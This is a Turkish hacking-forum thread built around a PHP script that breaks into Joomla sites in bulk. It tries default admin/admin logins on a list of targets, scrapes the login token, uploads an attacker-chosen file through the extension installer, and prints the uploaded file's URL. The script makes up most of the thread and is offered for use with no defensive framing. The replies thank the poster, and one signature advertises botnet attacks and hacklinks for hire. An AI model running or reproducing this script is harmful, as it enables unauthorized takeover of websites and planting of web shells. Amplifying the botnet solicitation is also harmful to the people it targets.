İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Standart Joomla Admin Panel Kırıcı + Otomatik Upload

20-09-2011 12:44
#1
!nFiNiTe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Nereden:
Hell
Mesajlar:
5.918
Teşekkür (Etti):
158
Teşekkür (Aldı):
858
Konular:
4645
Ticaret:
(0) %
Exploiti Yazan : MiyaChung


[PHP]
<?php //Joomla Admin Panel Kırıcı + Otomatik Upload Priv8 (com_install) //Coded by // // //Joomlada Son Scriptim artık ob_start(); set_time_limit(0); echo '<center><title>Joomla Admin Panel Kırıcı - Otomatik Upload Priv8 - Mavi1.Org [MiyaChung]</title><form method="post" action="" enctype="multipart/form-data"> <b>Joomla Admin Panel Kırıcı - Oto Upload Coded by MiyaChung<b><br><br>Siteler : <br><input type="file" name="siteler"><br> Dosya : <br><input type="text" name="dosya"><br> <input type="submit" name="start" value="Scan"><br>www.mavi1.org </form> </center>'; class mavi{ public $yol = '#value="/(.*?)"#s'; public $regex = "/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si"; public function admin($site){ $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt') ; curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); curl_setopt($curl,CURLOPT_FOLLOW********,1); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } public function post($site){ $hash=self::hashBul($site."/administrator/index.php"); $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt') ; curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); curl_setopt($curl,CURLOPT_FOLLOW********,1); curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,'username=adm in&passwd=admin&lang=en-GB&option=com_login&task=login&'.$hash.'=1'); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } public function upload($site,$dosya){ $hash=self::hashBul($site."/administrator/index.php"); $yol=self:luAl($site."/administrator/index.php?option=com_installer"); $dir=$_SERVER["********_ROOT"]."/".$dosya; $post = array("install_package"=>"@".$dir."","install_dire ctory"=>"".$yol."","install_url"=>"http://","type"=>"","installtype"=>"upload","task"=>"doIn stall","option"=>"com_installer","".$hash.""=>"1") ; $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php?option=com_installer"); curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt') ; curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); curl_setopt($curl,CURLOPT_FOLLOW********,1); curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,$post); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } public function hashBul($site){ $adres=self::admin($site); preg_match_all($this->regex,$adres,$token); return $token[1][0]; } public function yoluAl($site){ $curl=curl_init($site."/administrator/index.php?option=com_installer"); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt') ; curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); curl_setopt($curl,CURLOPT_FOLLOW********,1); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); preg_match_all($this->yol,$exec,$path); foreach($path[0] as $pathx){ $pathx=ereg_replace('value="','',$pathx); $pathx=ereg_replace('"','',$pathx); return $pathx; } } } if(isset($_POST['start'])){ $mavi=new mavi(); $dosya=$_POST['dosya']; $siteler=explode("\n",file_get_contents($_FILES["siteler"]["tmp_name"])); foreach($siteler as $sites){ $sites=trim($sites); if(eregi('com_config',$mavi->post($sites))){ $mavi->upload($sites,$dosya); if(preg_match('#<li>Unknown Archive Type</li>#s',$mavi->upload($sites,$dosya))){ $url = $sites."/tmp/".$dosya; echo '<a href="'.$url.'">'.$url.'</a><br>'; ob_flush(); flush(); } } } } ?>











[/PHP]





Exploit hakkında video = izle

Kullanıcı İmzası

Yaşlandık Artık.

20-09-2011 14:51
#2
JersaW - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Nereden:
Şehir diyomus venüs yazdm pardon ustaa :D
Mesajlar:
782
Teşekkür (Etti):
27
Teşekkür (Aldı):
355
Konular:
39
Ticaret:
(0) %
teşekkürler izleyecem şimdi...
Kullanıcı İmzası
/
22-09-2011 16:16
#3
ahmo25 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2009
Nereden:
Elbet Herkezin Gidecegi Yerden
Mesajlar:
93
Teşekkür (Etti):
14
Teşekkür (Aldı):
7
Konular:
23
Ticaret:
(0) %
biri sprinti yüklesede yapsak
Kullanıcı İmzası
22-09-2011 18:54
#4
By Bouncer - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2011
Nereden:
Avrupa
Mesajlar:
322
Teşekkür (Etti):
0
Teşekkür (Aldı):
100
Konular:
32
Ticaret:
(0) %
Güzel Paylaşım Sağol
22-09-2011 19:05
#5
alperenbozkurt - ait Kullanıcı Resmi (Avatar)
Binbaşı
Üyelik tarihi:
08/2011
Nereden:
El Castillo Del Diablo
Yaş:
29
Mesajlar:
516
Teşekkür (Etti):
51
Teşekkür (Aldı):
89
Konular:
37
Ticaret:
(0) %
eline sağlık güzel olmuş bastım
12-10-2011 23:58
#6
AreNT - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2011
Mesajlar:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
0
Ticaret:
(0) %
keşke program hakkında biraz bahsatseydiniz komutanım.
13-10-2011 14:34
#7
CoLe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2011
Mesajlar:
11
Teşekkür (Etti):
1
Teşekkür (Aldı):
1
Konular:
2
Ticaret:
(0) %
mavi1.org backlinklerine bakarsanız kaynak site bulabilirsiniz.
Kullanıcı İmzası
Haclink alınır.|Haklı olduğunuz konularda madursanız ücretsiz botnet saldırısı yapılır.|otodown kodu satın alınır

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı